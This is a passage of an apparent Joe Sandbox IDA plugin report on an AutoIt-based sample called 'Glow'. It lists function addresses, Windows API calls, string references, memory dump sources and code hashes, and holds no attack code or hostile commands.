CloseHandle.KERNEL32(00000000,00000000), ref: 003C3A0D

Strings

0$E, xrefs: 00382A2E
4'E, xrefs: 00382948
d(E, xrefs: 00382964
(&E, xrefs: 00382932
$E, xrefs: 0038280A

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: (&E$0$E$4'E$d(E$$E
API String ID: 1986988660-2707072083
Opcode ID: 7ce576f443645ee3709bfa39f8831abe31e30ca37b622f7452083fa42c2a6e21
Instruction ID: 9d66b7a5b25be54466d843a6e6c49cdef0a1852c011c57ab7bd370079c4f4fb0
Opcode Fuzzy Hash: 7ce576f443645ee3709bfa39f8831abe31e30ca37b622f7452083fa42c2a6e21
Instruction Fuzzy Hash: 9071BBB0911308AFC789EF69AF656153BE0BB5A302300827BD409DB263FBB48545CF5C

Function 003B90C5 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de0c8b310357cc53faf4275a8bd3eb5045fd09a3e2cd95344302bf67f524320b
Instruction ID: fca09ec377223c0598b3b54f518f532187a3dc33ee4b65e68fa3c0a5521e3f0b
Opcode Fuzzy Hash: de0c8b310357cc53faf4275a8bd3eb5045fd09a3e2cd95344302bf67f524320b
Instruction Fuzzy Hash: B1C10574E04249AFCF12DFE9D841BEDBBB4AF09304F15419AE714AB7A2C7308942CB60

Function 003835B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003835E1
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00383602
ShowWindow.USER32(00000000,?,?,?,?,?,?,00383368,?), ref: 00383616
ShowWindow.USER32(00000000,?,?,?,?,?,?,00383368,?), ref: 0038361F

Strings

AutoIt v3, xrefs: 003835D9, 003835DE, 003835DF
edit, xrefs: 003835FC

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 7d52a04064596136af03b5d37c8912e698878f257d5a44b855c591edb89f1ede
Instruction ID: 23ee4c835fb2f24106b2904560d28a63c303935e3079f52df2959581eda3a2b7
Opcode Fuzzy Hash: 7d52a04064596136af03b5d37c8912e698878f257d5a44b855c591edb89f1ede
Instruction Fuzzy Hash: 67F017B1A403957AE7214B23AD08E772FBDD7C7F51F00402BBD04A61A1C2A94881DAB8

Function 003861A9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 003C5287

Part of subcall function 00388577: _wcslen.LIBCMT ref: 0038858A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00386299

Strings

AutoIt - , xrefs: 0038620D
Line %d: , xrefs: 003C5305

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line %d: $AutoIt -
API String ID: 2289894680-4094128768
Opcode ID: 0128e8f4cb596407daaaf16e7ed00e0a98e1abb2cb2a9e574072e4424bb05481
Instruction ID: 0650363d8776752acea0429d1977f8130e2fe91a438c51ef17bf2cf277b955c2
Opcode Fuzzy Hash: 0128e8f4cb596407daaaf16e7ed00e0a98e1abb2cb2a9e574072e4424bb05481
Instruction Fuzzy Hash: 2F41A4714083146AC712FB20DC46FDFB7ECAF45310F104A6EF995861A2EB74EA49C796

Function 003B8A2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,?,OV<,003B894C,?,00449CE8,0000000C,003B89AB,?,OV<,?,003C564F), ref: 003B8A84
GetLastError.KERNEL32 ref: 003B8A8E
__dosmaperr.LIBCMT ref: 003B8AB9

Strings

OV<, xrefs: 003B8A30

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID: OV<
API String ID: 2583163307-1191810490
Opcode ID: f38cb7acf2ea42a3a47092b7387d407cabc9ec000c05c16119198dc5b189107c
Instruction ID: 219b87d39037e868603d8cd165cc12cd65f3fef0a22bb1bd3333ad1d8865c58c
Opcode Fuzzy Hash: f38cb7acf2ea42a3a47092b7387d407cabc9ec000c05c16119198dc5b189107c
Instruction Fuzzy Hash: 04012B336051605AC6276374AC867FE675D4B9273CF2A021AFB148F9D2DF70CD81C594

Function 003858CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,003858BE,SwapMouseButtons,00000004,?), ref: 003858EF
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,003858BE,SwapMouseButtons,00000004,?), ref: 00385910
RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,003858BE,SwapMouseButtons,00000004,?), ref: 00385932

Strings

Control Panel\Mouse, xrefs: 003858ED

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 79c01e582a8b9cb7f17b3ecde0bf96d419de33b2e6156b644d212cd4935fb98b
Instruction ID: ec7cc32d7131d9892c6ed5ea3c717d4e6a2bda625ef8362f2721f714c928a102
Opcode Fuzzy Hash: 79c01e582a8b9cb7f17b3ecde0bf96d419de33b2e6156b644d212cd4935fb98b
Instruction Fuzzy Hash: 251157B5610618FFDB229F64CC80AEEBBBCEF44764F1184A9E801E7210E3319E419B64

Function 00392B20 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00393006

Strings

CALL, xrefs: 00392FD6
bn>, xrefs: 00392B36, 00392E8D

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL$bn>
API String ID: 1385522511-2613667664
Opcode ID: 70b308a74d9752c4e80465190e1d62b7152115333269f1ef9edc64aef2bf81c7
Instruction ID: 7cbe58f5265e1098113e4990f6b8f3e9e4b3f3f6cc7d721befb523c6cc0ce3fd
Opcode Fuzzy Hash: 70b308a74d9752c4e80465190e1d62b7152115333269f1ef9edc64aef2bf81c7
Instruction Fuzzy Hash: EB229CB0608701AFCB16DF24C880A2BBBF5BF89314F15895DF4968B3A1D771E945CB82

Function 00383A95 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 003C413B

Part of subcall function 00385851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003855D1,?,?,003C4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00385871

Part of subcall function 00383A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00383A76

Strings

X, xrefs: 003C4109
`uD, xrefs: 003C4134

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X$`uD
API String ID: 779396738-2319419492
Opcode ID: c9bfe3b4f1a4f437ea2ff87eddcbcfe56ce28c200c2eac5bb97b4b267517984f
Instruction ID: 27fbb0325a35614e39c1a63363224ca3bae753abf76770f6ba837e2436ff3ef6
Opcode Fuzzy Hash: c9bfe3b4f1a4f437ea2ff87eddcbcfe56ce28c200c2eac5bb97b4b267517984f
Instruction Fuzzy Hash: 31218471A002589BDB06AF94C805BEE7BFC9F49714F00805AE545AB241DBF89A898F65

Function 003A014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 003A09D8

Part of subcall function 003A3614: RaiseException.KERNEL32(?,?,?,003A09FA,?,00000000,?,?,?,?,?,?,003A09FA,00000000,00449758,00000000), ref: 003A3674

__CxxThrowException@8.LIBVCRUNTIME ref: 003A09F5

Strings

Unknown exception, xrefs: 003A0A02

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 07e2de90cbcf97e877969a4829392e50609644236907fc8ef14af480db27aeb3
Instruction ID: f386fc3ccc97a956579bf51367a1ae4a84d4ac8d4f7914bce21060d2db050e9d
Opcode Fuzzy Hash: 07e2de90cbcf97e877969a4829392e50609644236907fc8ef14af480db27aeb3
Instruction Fuzzy Hash: 35F0F63490020CB7DB0ABAA4EC4699F776CDE03350B604525B924DB9F3FB74EA16C6D0

Function 004089B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00408D52
TerminateProcess.KERNEL32(00000000), ref: 00408D59
FreeLibrary.KERNEL32(?,?,?,?), ref: 00408F3A

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 892ccd079bfe37ace1ea42a6d5a6d863c83683c33d0654a77df84797fcffceed
Instruction ID: d500048167811be3020c9196eddc413601f9ce5081b0606fd90faa1081e64782
Opcode Fuzzy Hash: 892ccd079bfe37ace1ea42a6d5a6d863c83683c33d0654a77df84797fcffceed
Instruction Fuzzy Hash: 2C127B71A083019FD714DF24C584B6ABBE1FF84318F14896EE8899B392DB34E945CF96

Function 00409AF3 Relevance: 4.7, APIs: 3, Instructions: 233COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00409B87
_strcat.LIBCMT ref: 00409BC6
_wcslen.LIBCMT ref: 00409C14

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: _wcslen$_strcat
String ID:
API String ID: 306214811-0
Opcode ID: c138ef687a150d2a0e39c0b8c69a4202b7a31ff012ec2e8002aeffca89376091
Instruction ID: c28dab8bfb9a7907e88bc6dbe35ee10b02648df6e300db3e61c16c86062f1711
Opcode Fuzzy Hash: c138ef687a150d2a0e39c0b8c69a4202b7a31ff012ec2e8002aeffca89376091
Instruction Fuzzy Hash: CFA16931604605EFCB18DF18D5D1969BBB1FF46314B6084AEE80A9F292DB35ED42CB85

Function 0039FCAD Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 003861A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00386299

KillTimer.USER32(?,00000001,?,?), ref: 0039FD36
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0039FD45
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003DFE33

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: 2dd32d4540556f40718922753a2f3884c3771796861e6ed53b2c53309a4adcfb
Instruction ID: dede99ef3e74a7246e674f4df782e8f737547395f83033f49212b9dd5a470f8a
Opcode Fuzzy Hash: 2dd32d4540556f40718922753a2f3884c3771796861e6ed53b2c53309a4adcfb
Instruction Fuzzy Hash: EA31C571904344AFEB33CF24D885BE7BBEC9B02308F1044AED5DA97242C3745A85CB51

Function 003B970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,003B97BA,FF8BC369,00000000,00000002,00000000), ref: 003B9744
GetLastError.KERNEL32(?,003B97BA,FF8BC369,00000000,00000002,00000000,?,003B5ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,003A6F41), ref: 003B974E
__dosmaperr.LIBCMT ref: 003B9755

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: b09362d1a32091758316522d2628dacc773fb868a7151f871d2ee1d97ca3d2a8
Instruction ID: f49a26e07b14f047a4286721e4523ef99281e57addca48137ab7176694889470
Opcode Fuzzy Hash: b09362d1a32091758316522d2628dacc773fb868a7151f871d2ee1d97ca3d2a8
Instruction Fuzzy Hash: 1D014033620514AFCB069F99DC46DEE7769DB85334B240255FA118B590EE70DE418790

Function 0038396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00383A3C

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 1937714ffb41e9286d423180db8d9d8d97a4faea7d19b4695ae659bed569efa5
Instruction ID: b6b83af2e4a02fa52631b14ee11db5d6d4e670efb43e26ad3bc84a11c3fb23eb
Opcode Fuzzy Hash: 1937714ffb41e9286d423180db8d9d8d97a4faea7d19b4695ae659bed569efa5
Instruction Fuzzy Hash: E831C3705047009FD322EF34D884797BBE8FB49709F00092EE9DA87341E7B4AA48CB56

Function 0038331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 0038333D

Part of subcall function 003832E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 003832FB
Part of subcall function 003832E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00383312

Part of subcall function 0038338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00383368,?), ref: 003833BB
Part of subcall function 0038338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00383368,?), ref: 003833CE
Part of subcall function 0038338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00452418,00452400,?,?,?,?,?,?,00383368,?), ref: 0038343A
Part of subcall function 0038338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00452418,?,?,?,?,?,?,?,00383368,?), ref: 003834BB

SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00383377

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
String ID:
API String ID: 1550534281-0
Opcode ID: c665bdcd507c73c6481c77d1d779476e8870071208081f1014bc2838ab73edfd
Instruction ID: ca342deb317ac528e8cf82b25d0fc80fd5ba6b158c213e90e1fcacecd0eb5cae
Opcode Fuzzy Hash: c665bdcd507c73c6481c77d1d779476e8870071208081f1014bc2838ab73edfd
Instruction Fuzzy Hash: E2F05472655345AFD7027F70EE0AB643794E705B0BF004866B905491E3DBF9D1508B48

Function 0039FFE0 Relevance: 2.6, APIs: 2, Instructions: 94sleepCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 003A007D
Sleep.KERNEL32 ref: 003A008F

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: CloseHandleSleep
String ID:
API String ID: 252777609-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: b439548787ed6f9f275b06df3cc400491fcc72fcacdb5949131ce024271311a6
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: FD31D070A00106DFC71ECF58D490A69FBA6FB5A300B2986A5E40ACB652D732EDC1CBC0

Function 0038CAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0038CEEE

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 7c84900d47349221ca2912a2b4de4b594d25af44023c6e6f11c00a6a458c3281
Instruction ID: 5bc99786f58af144a8df813a64a8fe168307e5ac2eb2b610d94136d55df56a5d
Opcode Fuzzy Hash: 7c84900d47349221ca2912a2b4de4b594d25af44023c6e6f11c00a6a458c3281
Instruction Fuzzy Hash: 4D32E175A00305AFDB12EF54D884ABAB7B9FF45341F1680AAED06AB351C734ED45CBA0

Function 00407AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 7a7eba1c66e3a1b42d0dd192cd92e469b092622c229d2e378ba99205ad9452c0
Instruction ID: 9ac96e609286eae9310a16caaca735c488c95d429c863dd4c8a722faa483c863
Opcode Fuzzy Hash: 7a7eba1c66e3a1b42d0dd192cd92e469b092622c229d2e378ba99205ad9452c0
Instruction Fuzzy Hash: EAD16B74E0420AEFCB15EF94C4819AEBBB5FF48310F1441AAE915AB391DB34BD42CB95

Function 003AF106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

